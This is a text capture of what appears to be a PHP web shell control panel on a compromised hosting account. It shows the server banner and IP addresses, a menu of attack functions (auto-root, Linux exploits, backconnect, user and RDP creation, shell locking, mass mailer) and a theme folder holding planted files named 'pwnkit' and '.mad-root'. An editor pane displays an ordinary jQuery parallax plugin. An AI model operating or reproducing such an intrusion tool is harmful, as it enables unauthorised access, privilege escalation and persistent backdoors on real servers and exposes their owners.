Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
templates /
bizone /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
bootstrap.min.js
36.01
KB
-rw----r--
functions.js
4.49
KB
-rw----r--
jPushMenu.js
2.93
KB
-rw----r--
jqSocialSharer.min.js
1.37
KB
-rw----r--
jquery-countTo.js
2.62
KB
-rw----r--
jquery.appear.js
3.26
KB
-rw----r--
jquery.circliful.js
9.4
KB
-rw----r--
jquery.easing.min.js
5.48
KB
-rw----r--
jquery.fancybox-media.js
5.37
KB
-rw----r--
jquery.fancybox-thumbs.js
3.9
KB
-rw----r--
jquery.fancybox.js
49.54
KB
-rw----r--
jquery.mixitup.min.js
27.69
KB
-rw----r--
jquery.parallax-1.1.3.js
1.8
KB
-rw----r--
owl.carousel.min.js
23.38
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
wow.min.js
4.67
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.parallax-1.1.3.js
/* Plugin: jQuery Parallax Version 1.1.3 Author: Ian Lunn Twitter: @IanLunn Author URL: http://www.ianlunn.co.uk/ Plugin URL: http://www.ianlunn.co.uk/plugins/jquery-parallax/ Dual licensed under the MIT and GPL licenses: http://www.opensource.org/licenses/mit-license.php http://www.gnu.org/licenses/gpl.html */ (function( $ ){ var $window = $(window); var windowHeight = $window.height(); $window.resize(function () { windowHeight = $window.height(); }); $.fn.parallax = function(xpos, speedFactor, outerHeight) { var $this = $(this); var getHeight; var firstTop; var paddingTop = 0; //get the starting position of each element to have parallax applied to it $this.each(function(){ firstTop = $this.offset().top; }); if (outerHeight) { getHeight = function(jqo) { return jqo.outerHeight(true); }; } else { getHeight = function(jqo) { return jqo.height(); }; } // setup defaults if arguments aren't specified if (arguments.length < 1 || xpos === null) xpos = "50%"; if (arguments.length < 2 || speedFactor === null) speedFactor = 0.1; if (arguments.length < 3 || outerHeight === null) outerHeight = true; // function to be called whenever the window is scrolled or resized function update(){ var pos = $window.scrollTop(); $this.each(function(){ var $element = $(this); var top = $element.offset().top; var height = getHeight($element); // Check if totally above or totally below viewport if (top + height < pos || top > pos + windowHeight) { return; } $this.css('backgroundPosition', xpos + " " + Math.round((firstTop - pos) * speedFactor) + "px"); }); } $window.bind('scroll', update).resize(update); update(); }; })(jQuery);
Close